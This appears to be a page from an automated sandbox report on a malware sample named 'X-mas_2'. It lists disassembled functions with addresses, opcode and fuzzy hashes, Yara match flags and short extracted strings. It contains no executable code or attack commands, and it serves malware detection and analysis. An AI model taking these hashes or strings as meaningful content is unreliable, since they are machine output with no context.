Instruction ID: 59fb6676a46cb5b2c496f07d3e0a494b9ac9741146e74fd95afe865ddde67d2c
Opcode Fuzzy Hash: fb36033027b08c92b0ba88995fcc40c0fbf284deaf0fb6098ad024fa33f4dc7a
Instruction Fuzzy Hash: C5513576A08310DFE7108F54EC8176BB7E0FBC4318F04497EFA8997291D7B999068B96

Function 0042A050 Relevance: 1.7, Strings: 1, Instructions: 428COMMON

Download Yara Rule

Strings

", xrefs: 0042A3A7

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 62bc9d78861723f16aa47cdc0de941e55b0cb002e077fe1c3814b4b6b9e9140b
Instruction ID: fc6a7fef22a05f64015de1e3c3639137bf4aa38685eff02bd3fad1d047ddcb30
Opcode Fuzzy Hash: 62bc9d78861723f16aa47cdc0de941e55b0cb002e077fe1c3814b4b6b9e9140b
Instruction Fuzzy Hash: 86D11672B083259FC714CE24E48076BB7E5AB84314F88896EEC9987382E778DC55C797

Function 0041CA60 Relevance: 1.7, Strings: 1, Instructions: 414COMMON

Download Yara Rule

Strings

UR, xrefs: 0041CD44

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: UR
API String ID: 0-57707318
Opcode ID: dd60f0a3bd934274d443de5fabb80a09b9a3256423ee92692702c2b9107682ec
Instruction ID: 8fe4e70974bd7395cce93e3b113d0d48c717d0737e0d11109a7980f2f1e1c3b0
Opcode Fuzzy Hash: dd60f0a3bd934274d443de5fabb80a09b9a3256423ee92692702c2b9107682ec
Instruction Fuzzy Hash: 61B133755583018BC720CF28CC926ABB7F1EF91364F18961DE8D59B390E338D945C79A

Function 0210C0F1 Relevance: 1.6, Strings: 1, Instructions: 398COMMON

Download Yara Rule

Strings

BVAI, xrefs: 0210C791

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: BVAI
API String ID: 0-2651495128
Opcode ID: 5041da3ee5ecb9b51dc3e2d4fd58fed6428d23dbcbae8441b082f11ba008db15
Instruction ID: b61b431d3470a95ce79d90c2b3a553cc2d3eb78a7996f0b7838c68a9e65cdbfa
Opcode Fuzzy Hash: 5041da3ee5ecb9b51dc3e2d4fd58fed6428d23dbcbae8441b082f11ba008db15
Instruction Fuzzy Hash: EBC1F83164C3908BC729CF2984907ABBFE1AFDA308F184A6ED4C9D7392D7758506CB56

Function 02107F17 Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 02108027

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 398c5195130bdc226052c7f70d011f7c39105b8c39a0f36c746c1dc9ef1c74bc
Instruction ID: f57605c4e7a7d884e33939c6f9741ac0a48857029b31610a00b93e9e0a3ccf9c
Opcode Fuzzy Hash: 398c5195130bdc226052c7f70d011f7c39105b8c39a0f36c746c1dc9ef1c74bc
Instruction Fuzzy Hash: B94173B0E002589FDB10DF7C8D46B9DBBB4AB45600F5041AEE409EB286D73459468F96

Function 00440130 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

`ibc, xrefs: 00440132

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InitializeThunk
String ID: `ibc
API String ID: 2994545307-3725910391
Opcode ID: 51f59b0b037f56fe4164c93a7a6ca611e73633d5b3b2a6693a0e49c4dc543b74
Instruction ID: f6e7def48d8e745c044bbeb26ce4e72402efdfd5aebbe0cd908a1d30c76b08d8
Opcode Fuzzy Hash: 51f59b0b037f56fe4164c93a7a6ca611e73633d5b3b2a6693a0e49c4dc543b74
Instruction Fuzzy Hash: DA9114356183019BE714CF18C89166FB7E2EFD9310F18852DEA858B391EB35DC61CB86

Function 02120397 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

`ibc, xrefs: 02120399

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: `ibc
API String ID: 0-3725910391
Opcode ID: a1c6c167f9b49c5db6f5f2723aab8a4bda377f36e70cae290c604251a5752295
Instruction ID: c3bf24e9baa46ddbba78259cfcf0eefad57b96b1555b263f3f9ecdb4f00f3054
Opcode Fuzzy Hash: a1c6c167f9b49c5db6f5f2723aab8a4bda377f36e70cae290c604251a5752295
Instruction Fuzzy Hash: C19104757483219FD7188F18C890A6EB7E2EFE9314F19862CF58687391DB31D865CB82

Function 00405DA0 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

,, xrefs: 00405F09

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: add5d3d9ba30fe1a90ea683ee1e329ddfa9ecc8f8f9b6a47b6e37303dad974ee
Instruction ID: 263c9164548149212bab00621b26dadebf9e5cd68813eca0907a9d13e3b8c170
Opcode Fuzzy Hash: add5d3d9ba30fe1a90ea683ee1e329ddfa9ecc8f8f9b6a47b6e37303dad974ee
Instruction Fuzzy Hash: D9B138712097859FD324CF28C88065BBBE0AFA9704F444E2DE5D997382D235EA18CB97

Function 020E6007 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

,, xrefs: 020E6170

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: add5d3d9ba30fe1a90ea683ee1e329ddfa9ecc8f8f9b6a47b6e37303dad974ee
Instruction ID: f66c8456f0164755b212962a30b01fb29e652c980ddc4b09de0c93811895a30c
Opcode Fuzzy Hash: add5d3d9ba30fe1a90ea683ee1e329ddfa9ecc8f8f9b6a47b6e37303dad974ee
Instruction Fuzzy Hash: 7FB149712083819FD721CF68D88065FFBE4AFA9204F484E2DE5DA97342D232E958CB57

Function 0041D260 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

~, xrefs: 0041D32B

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 2664bb8dc537b4f7fd320cbe31f1bc9facf10d8e06094f3d85fc7ef8eeac098a
Instruction ID: c6b100cd4e7dff2771264374d25d72747b80feda865de7cda43b8dec31ed639d
Opcode Fuzzy Hash: 2664bb8dc537b4f7fd320cbe31f1bc9facf10d8e06094f3d85fc7ef8eeac098a
Instruction Fuzzy Hash: 28813AB69042614FC7218E28C8513AFBBD1AB95324F19C27DECB99B392D2389C45D7D1

Function 0211BF47 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

yPC, xrefs: 0211C014

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: yPC
API String ID: 0-621879255
Opcode ID: cb322f75891ac129ee27641cc77bae92e37b7c1514e867416012a434c81d789e
Instruction ID: 22da6a1bd81cf18d6b60d1e161c238158ae8cb9f60e7f68c94c083fc08b56da0
Opcode Fuzzy Hash: cb322f75891ac129ee27641cc77bae92e37b7c1514e867416012a434c81d789e
Instruction Fuzzy Hash: A8616976AC82209BD7249A28CC51B7FB7A3ABD5714F2E853DD9C557341E7319C018BC2

Function 020ED95F Relevance: 1.5, Strings: 1, Instructions: 232COMMON

Download Yara Rule

Strings

]b, xrefs: 020ED9EE

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: ]b
API String ID: 0-3983552914
Opcode ID: 416f5a0ace6e6ba72c734dbe947573464599ab33d1e233289b3341e2fccb922a
Instruction ID: 7b8b5498a63bda8c9a8e6ae88f2e7a8fdd4712a95034af76be136683da3b7b65
Opcode Fuzzy Hash: 416f5a0ace6e6ba72c734dbe947573464599ab33d1e233289b3341e2fccb922a
Instruction Fuzzy Hash: A5616776E193908BD721CB25CC517EFBAE2AFC5315F19CA6CC8C9E7285DB3449028782

Function 0041CECA Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

:;8, xrefs: 0041D0B0

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: :;8
API String ID: 0-370357910
Opcode ID: 93ed62283d0ade6070abc49e03dfb39d6bb0373843478f8e3a28649a63a9fbd3
Instruction ID: 6cb1dbdef0645cb70831a53be780a797aaf24bd5e036ecf1d586697fe6f75162
Opcode Fuzzy Hash: 93ed62283d0ade6070abc49e03dfb39d6bb0373843478f8e3a28649a63a9fbd3
Instruction Fuzzy Hash: 1751E0B1A483108BD714DF64C8126ABB7F2EF86318F18896DE4858B391E73AD506C75A

Function 020FD13C Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

:;8, xrefs: 020FD317

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: :;8
API String ID: 0-370357910
Opcode ID: 439b216266071e9dd543fe9943419bccd0ea7c1905db088ffb3df775a4e11300
Instruction ID: 014151753969d2ea40d43622cbacbb2d9f85b1046c94bf0781bfcee532b28bc4
Opcode Fuzzy Hash: 439b216266071e9dd543fe9943419bccd0ea7c1905db088ffb3df775a4e11300
Instruction Fuzzy Hash: CA51DE706483108BD755DF64C82276BB7F2EFD2308F18891CE5858B391E73AD106DB56

Function 020F49DC Relevance: 1.4, Strings: 1, Instructions: 183COMMON

Download Yara Rule

Strings

]k, xrefs: 020F4A41

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: ]k
API String ID: 0-2494335286
Opcode ID: 7fdcd651f1eb7f3d3219a473d4fa27b65f50eb9a34a114c868446d28450dfa05
Instruction ID: 8f7b6b209d4496e1d6ad0046ae88911656d319049fe7e6cf3e5547d5f0b3951a
Opcode Fuzzy Hash: 7fdcd651f1eb7f3d3219a473d4fa27b65f50eb9a34a114c868446d28450dfa05
Instruction Fuzzy Hash: A1416AA6A4836286D768CF24D891377B3E2EFE4304F19543CCE8297B41F7798905D396

Function 0041FE7C Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

`, xrefs: 0042008D

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 7b4730b591edb9b796dc1a7cdf100b83fbe1eb626615b9897db752f12f111dbd
Instruction ID: 9732de87ecb182f2271c988b8e40e3b004a85c04e183e157bc0133afcabd703d
Opcode Fuzzy Hash: 7b4730b591edb9b796dc1a7cdf100b83fbe1eb626615b9897db752f12f111dbd
Instruction Fuzzy Hash: D261C271618F808BD364CA3CC995256BAD2AF96334F188B6DE1FA8B7D2D778A4058701

Function 021000E3 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

`, xrefs: 021002F4

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 7b4730b591edb9b796dc1a7cdf100b83fbe1eb626615b9897db752f12f111dbd
Instruction ID: 15af4741d77a1fbfb8ab9abf8590932db5607487ad06681e7094d386198ece1e
Opcode Fuzzy Hash: 7b4730b591edb9b796dc1a7cdf100b83fbe1eb626615b9897db752f12f111dbd
Instruction Fuzzy Hash: 9061AF71608F808BD368CA3CC995356BAE2AF56334F188B6CE1FB8B7D1D774A4058701

Function 0040EB80 Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

~, xrefs: 0040ECD4

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 7bde353b180e3433f99e206e2358377bdfc5ba822801ea3c6ae1797dc9d290ef
Instruction ID: aad47e99843925c2084c89470e4a7e36356acbeb38c1926c5526f137fb7122d0
Opcode Fuzzy Hash: 7bde353b180e3433f99e206e2358377bdfc5ba822801ea3c6ae1797dc9d290ef
Instruction Fuzzy Hash: 2351013151C7908AD7249B3984402EFBBD1AB97364F288E3FE9E5973D1D2398403974B

Function 0043F830 Relevance: 1.4, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

XL, xrefs: 0043F855

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: XL
API String ID: 0-2397331993
Opcode ID: cf544509813e290d1fe305b6ed588265bafe356c3c06b66d96e85f8fc0105e35
Instruction ID: aa4fe24152c52a858318c677d95a7a0c2cd254ae91a73a2a1ffc4a6790d9ff85
Opcode Fuzzy Hash: cf544509813e290d1fe305b6ed588265bafe356c3c06b66d96e85f8fc0105e35
Instruction Fuzzy Hash: C1419C38258351DFD3049F38E85066AB7E0FB4A315F0998BDD4C683361D37A99A5CB06

Function 0211DF50 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

D]+\, xrefs: 0211DFC7

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: D]+\
API String ID: 0-1174097187
Opcode ID: 6c62bb730831ef060c05a1cf310f7da9f125142f04c3054a3a686272e3192fd1
Instruction ID: d327fbb695418c5cc35a8d5ad856f558b09c619603f2769fbf9b52480d8de519
Opcode Fuzzy Hash: 6c62bb730831ef060c05a1cf310f7da9f125142f04c3054a3a686272e3192fd1
Instruction Fuzzy Hash: 503126787C82109BE7189FD5D891A3A73A6E7CE304F19913DD98197686D3349C02CB9A

Function 004155DB Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

gfff, xrefs: 004155E1

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InitializeThunk
String ID: gfff
API String ID: 2994545307-1553575800
Opcode ID: df44e3619374106ad262fc43b683f6ef326694f7b728e93f5ec5f7c0b4c5e613
Instruction ID: 2386a0911aa688524989a8340c90167ef89acf6b9e7633cd49b65fbe482c82f4
Opcode Fuzzy Hash: df44e3619374106ad262fc43b683f6ef326694f7b728e93f5ec5f7c0b4c5e613
Instruction Fuzzy Hash: AA31C371614645CFD728CF28C9517EBB7E6ABDA304F44853ED086CB351EB349444CB86

Function 020F5842 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

gfff, xrefs: 020F5848

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: ea9c09ded99664ab98a6c6f0e9b0a70131b448c26a3b559d56da829a00da26aa
Instruction ID: 1c4fe94900c70b51f2741ec065dad965667f7fcf21816086734d6152feb6bf51
Opcode Fuzzy Hash: ea9c09ded99664ab98a6c6f0e9b0a70131b448c26a3b559d56da829a00da26aa
Instruction Fuzzy Hash: 6231D4716543858FD76CCF28CC51BABBBE6ABDA308F48953DD086CB651EB349404CB86

Function 0041BFCA Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

SUQ, xrefs: 0041C004

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: SUQ
API String ID: 0-2651150828
Opcode ID: 14005623d6de7249a8b851f33e9c3310cb894edf402dd1a84a64b2ad003841e7
Instruction ID: 42c55c053425e0b0fbc475bcc9400de1786cc42e84e4724c7975db07e5bacbf3
Opcode Fuzzy Hash: 14005623d6de7249a8b851f33e9c3310cb894edf402dd1a84a64b2ad003841e7
Instruction Fuzzy Hash: EE21B1706083818FC714CF28C4A07ABBFE2AFD6328F188A5DE5E547392D335C4498766

Function 0042BA79 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

j, xrefs: 0042BAB9

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: j
API String ID: 0-2137352139
Opcode ID: c71afa6b20323cbab2bb37583566809d1d087a9fa354429759ce03f3baf40deb
Instruction ID: f136246ef15f79f812ec07c1db461e86a52f6259eac92e8ccd6656980116f0fb
Opcode Fuzzy Hash: c71afa6b20323cbab2bb37583566809d1d087a9fa354429759ce03f3baf40deb
Instruction Fuzzy Hash: 902124316083928AD3258F36945076BBBD5DFD7304F18889EE5C5AB382CB7884028B5A

Function 0042C140 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

'C, xrefs: 0042C148

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: 'C
API String ID: 0-1959375024
Opcode ID: 15b3dceed2422b8a86bb36206473813b246add45689b2aad14f1ff44a5455306
Instruction ID: 6a2eb9f9bc051ac7585a28991c81e0efb8283155a37514e0de2331f159ba5eab
Opcode Fuzzy Hash: 15b3dceed2422b8a86bb36206473813b246add45689b2aad14f1ff44a5455306
Instruction Fuzzy Hash: 6401283070C3618FC715CF69E5C0227BBE2EBD6300F1891AAD8D49B216C679C90A879F

Function 0043E6E0 Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

X|T, xrefs: 0043E74F

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: X|T
API String ID: 0-2625694639
Opcode ID: f300bed5bc34852233b1656f5377e06bb0b50d32563c744d353c8ad641e09496
Instruction ID: d1cbbd9272d1375db2703005e1fbf4b2755e8cb02be92dc54b6a5afa885c6bec
Opcode Fuzzy Hash: f300bed5bc34852233b1656f5377e06bb0b50d32563c744d353c8ad641e09496
Instruction Fuzzy Hash: 01014477E997A48FD3485F749CC607BB2E0EB47705F0A183DEDC9AB280C5659D00D648

Function 0211E947 Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

X|T, xrefs: 0211E9B6

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: X|T
API String ID: 0-2625694639
Opcode ID: f300bed5bc34852233b1656f5377e06bb0b50d32563c744d353c8ad641e09496
Instruction ID: c6c9e1e191aa31cbf4736212ac4fb5c228c838f3b9ba7f2d9d21eed48d80f609
Opcode Fuzzy Hash: f300bed5bc34852233b1656f5377e06bb0b50d32563c744d353c8ad641e09496
Instruction Fuzzy Hash: 18014477E987A48FD7485F749CC107BB2E0EB47705F0A143CEDC9AB240C5659D00D649

Function 02103268 Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

"0B, xrefs: 0210327D

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: "0B
API String ID: 0-2199674323
Opcode ID: 954ae02fdf73457b1dbd67bdadd412222d48989489ec8dd9747075f29d6ff67f
Instruction ID: b9d3b7ebb7d45309089f679671e49c594f9a371ae2472a1d50f800a3bc410fa3
Opcode Fuzzy Hash: 954ae02fdf73457b1dbd67bdadd412222d48989489ec8dd9747075f29d6ff67f
Instruction Fuzzy Hash: 23C04C31B592019BEB1CDF389C65B7DA2EA9B47710F15642C754BE75C0DA64D850850C

Function 02102ADD Relevance: 1.3, Strings: 1, Instructions: 8COMMON

Download Yara Rule

Strings

"0B, xrefs: 0210327D

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: "0B
API String ID: 0-2199674323
Opcode ID: 8579838f92f0ed93d7ee67ee0dc2e8c93fb1d001ae9c7d65f88e54066d6649bd
Instruction ID: f8d97db0f4ab39d7eea04afcb327493c0d664cfb3023c84a353e776fdd317303
Opcode Fuzzy Hash: 8579838f92f0ed93d7ee67ee0dc2e8c93fb1d001ae9c7d65f88e54066d6649bd
Instruction Fuzzy Hash: 03A00234E9D141DAD61D8F60AC90470E279BB4F191F113868803FB75E1D750D445C61C

Function 00416148 Relevance: 1.0, Instructions: 974COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21f1b8bd8a719ddbe8c4ea0fcc52d12380974d4c75bee49ea26b480580b85d0b
Instruction ID: 40a78145a15ed7abd580535788d63f0ce19baa41bfbb966a4b0a28bc3c900fb3
Opcode Fuzzy Hash: 21f1b8bd8a719ddbe8c4ea0fcc52d12380974d4c75bee49ea26b480580b85d0b
Instruction Fuzzy Hash: 33428C759183518BD724CF28C850BBBB7E2EB97304F1A887DD4C297292D738D941CB9A

Function 004065F0 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 939f650d3dd9e681e253b1e8bbe1072b550d94377d2c7f5f4051c8aec9b7b9d9
Instruction ID: 0b7c30790ff7d95851666302495b6cb6b96fef3e5f93ae92670a14908cf15253
Opcode Fuzzy Hash: 939f650d3dd9e681e253b1e8bbe1072b550d94377d2c7f5f4051c8aec9b7b9d9
Instruction Fuzzy Hash: FC52C4B0908B848FE735CB24C4843A7BBE1AB91314F16893FC5D716BC2C37DA995971A

Function 020E6857 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cd38c1f917d56529f2e9072a767a05c965a744410acbca6e37e46bfde3c2afc
Instruction ID: fbcf7f86a587e90d7d3f7d8ccb945fe6b6f6dc10a37d7e8b64aee6dd98141566
Opcode Fuzzy Hash: 0cd38c1f917d56529f2e9072a767a05c965a744410acbca6e37e46bfde3c2afc
Instruction Fuzzy Hash: 9F52F6709087848FEF76CB24D4843ABBBE5EB51314F14886EC5E7066D2C37AA5C4DB05

Function 00402ED0 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cf5f40db601465183f1577b92b9d452b740621377bdeef01513126a201992b7
Instruction ID: 5393f3433c53e1f8dfd6ebf06364cad0a5c17ff95c182cda39d20013721ad581
Opcode Fuzzy Hash: 0cf5f40db601465183f1577b92b9d452b740621377bdeef01513126a201992b7
Instruction Fuzzy Hash: AA52E4715083458FCB15CF14C0906AABFE1BF89305F188A7EF8996B381D779EA49CB85

